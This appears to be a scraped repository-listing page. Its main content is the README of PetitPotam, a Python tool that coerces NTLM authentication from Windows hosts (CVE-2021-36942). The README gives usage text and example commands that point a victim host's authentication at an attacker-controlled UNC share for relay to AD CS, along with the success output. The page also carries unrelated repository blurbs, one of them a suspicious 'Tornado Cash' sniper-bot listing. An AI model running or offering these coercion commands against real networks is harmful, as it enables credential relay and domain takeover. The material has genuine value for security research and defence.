Python implementation for PetitPotam

Related tags

Third-party APIs WrappersPetitPotam
Overview

PetitPotam

Coerce NTLM authentication from Windows hosts

Installtion

$ pip3 install impacket

Usage

usage: petitpotam.py [-h] [-debug] [-port [destination port]] [-pipe pipe]
                     [-method method] [-target-ip ip address]
                     [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                     target path

PetitPotam - Coerce authentication from Windows hosts

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  path                  UNC path for authentication

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -pipe pipe            Named pipe to use (default: lsarpc)
  -method method        Method used for coercing authentication
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use
                        whatever was specified as target. This is useful when
                        target is the NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from
                        ccache file (KRB5CCNAME) based on target parameters. If
                        valid credentials cannot be found, it will use the ones
                        specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will
                        use the domain part (FQDN) specified in the target
                        parameter

Examples

In these examples, the victim is 172.16.19.100 and the attacker is 172.16.19.1

The attack can use impacket-ntlmrelayx to relay the authentication to interesting endpoints, for instance Active Directory Certificate Services Web Enrollment.

By default, a random method will be chosen.

The target may or may not require authentication. These examples were tested on a Windows 2022 server, and no authentication was required.

The UNC path must point to the attacker's listener. Note that if the attacker is not part of the trusted intranet zone, the Windows host will try to authenticate with a null session. This can be circumvented by either using a NETBIOS name or ADIDNS record for the attacker.

Random Method

$ python3 petitpotam.py -debug '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Choosing random method
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Specific Method

$ python3 petitpotam.py -debug -method AddUsersToFile '172.16.19.100' '\\172.16.19.1\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:172.16.19.100[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\172.16.19.1\\share\\foo'
[*] Success!

Details

PetitPotam was orignally created / discovered by topotam. This exploit is heavily based on the implementation and research from topotam.

If you're using ntlmrelayx and the Windows host connects with an anonymous logon (null) session, please see this pull request to fix the issue. You can confirm the authentication coercion with Responder.

CVE-2021-36942

Microsoft has released a patch for PetitPotam, but only for two of the methods (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv). For that reason, those methods are not implemented in this exploit.

Instead, the other methods (which were not fully implemented by topotam) have been implemented in this exploit.

Authors

Credits

Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
GitHub Repository
Discord Bot written in Python that plays music in your voice channel

Discord Bot that plays music! I decided to create a simple Discord bot using Python in order to advance my coding skills. Please don't ask me for help

Eric Yeung 39 Jan 01, 2023
YouTube bot, this is just my introduction to api and requests, this isn't intended on being an actual view bot.

YouTube bot, this is just my introduction to api and requests, this isn't intended on being an actual view bot.

Aran 2 Jul 25, 2022
Discord bot that displays Jazz Jackrabbit 2 server status, current gamemode as "Playing.." status

JJ2-server-status-discord-bot Discord bot that displays Jazz Jackrabbit 2 server status, current gamemode as "Playing.." status How to setup: 0. Downl

2 Dec 09, 2021
An API that allows you to get full information about TikTok videos

TikTok-API An API that allows you to get full information about TikTok videos without using any third party sources and only the TikTok API. ##API onl

FC 13 Dec 20, 2021
Discovery is an open-source Discord Bot with the main features Tickets, Moderation, Giveaways and Reaction roles.

Discovery is an open-source Discord Bot with the main features Tickets, Moderation, Giveaways and Reaction roles.

1 Dec 29, 2021
The Python version of the official Discord bot for the Astura Studios Discord community server.

About Astura (Python version) is the official Discord bot for the Astura Studios Discord community server developed and maintained by Ascendus and the

Ascendus 1 Apr 21, 2022
Reddit cli to slack at work

Reddit CLI (v1.0) Introduction Why Reddit CLI? Coworker who sees me looking at something in a browser: "Glad you're not busy; I need you to do this, t

3 Jun 22, 2021
Periodically check the manuscript state in the scholar one system and send email when finding a new state.

ScholarOne-manuscript-checker Periodically check the manuscript state in the scholar one system and send email when finding a new state. Parameters ne

2 Aug 18, 2022
A GitHub Follower Bot that is a WIP.

GitHub Follower Bot (WIP) Work In Progress This bot is a WIP. There are still many features I plan to add and code I need to improve (I'm still fairly

Christian Deacon 71 Dec 29, 2022
Pancakeswap-Sniper-TORNADO-CASH--MAC-WIN-ANDROID-LINUX--2022-V1 - Pancakeswap Sniper BOT - TORNADO CASH (MAC WINDOWS ANDROID LINUX) FAST snipe BUY token on LUANCH after add LIQUIDITY

TORNADO CASH Pancakeswap Sniper BOT 2022-V1 (MAC WINDOWS ANDROID LINUX) ⭐️ AUTO

Crypto Trader 3 Jan 08, 2022
an API to check if a url or IP address is safe or phishing

an API to check if a url or IP address is safe or phishing. Using a ML model. The API created using FastAPI.

Adel Dahani 1 Feb 16, 2022
Checks instagram names to see if they're available

How to install You must have python 3.7.6 installed and make sure you click the 'ADD TO PATH' option when installing Open cmd and type pip install aio

2 Oct 20, 2021
An Telegram Bot By @AsmSafone To Stream Videos in Telegram Voice Chat. This is Also The Source Code of The Bot Which is Being Used In @SafoTheBot Group! ❤️

Telegram Video Player Bot (Beta) An Telegram Bot By @AsmSafone To Stream Videos in Telegram Voice Chat. Special Features Supports Live Streaming From

SAF ONE 206 Jan 03, 2023
Pretend to be a discord bot

Pretendabot © Pretend to be a discord bot! About Pretendabot© is an app that lets you become a discord bot!. It uses discord intrigrations(webhooks) a

Advik 3 Apr 24, 2022
Python bot for send videos of a Youtube channel to a telegram group , channel or chat

py_youtube_to_telegram Usage: If you want to install ytt and use it, run this command: sudo sh -c "$(curl -fsSL https://raw.githubusercontent.com/nima

Nima Fanniasl 8 Nov 22, 2022
Use PyTgCalls easier than before.

PyTgCalls wrapper Making it easier for you to use pytgcalls. Features No need to care about audio convertion. Play directly from URLs, YouTube and loc

Calls Music 12 Jul 21, 2022
Google Sheets Python API v4

pygsheets - Google Spreadsheets Python API v4 A simple, intuitive library for google sheets which gets your work done. Features: Open, create, delete

Nithin Murali 1.4k Jan 08, 2023
A client that allows a user, specifiy their discord token, to send images remotely to discord

ImageBot_for_Discord A client that allows a user, specifiy their discord token, to send images remotely to discord. Can select images using a file dia

0 Aug 24, 2022
A light weight Python library for the Spotify Web API

Spotipy A light weight Python library for the Spotify Web API Documentation Spotipy's full documentation is online at Spotipy Documentation. Installat

Paul Lamere 4.2k Jan 06, 2023
Template to create a telegram bot in python

Template for Telegram Bot Template to create a telegram bot in python. How to Run Set your telegram bot token as environment variable TELEGRAM_BOT_TOK

PyTopia 10 Mar 07, 2022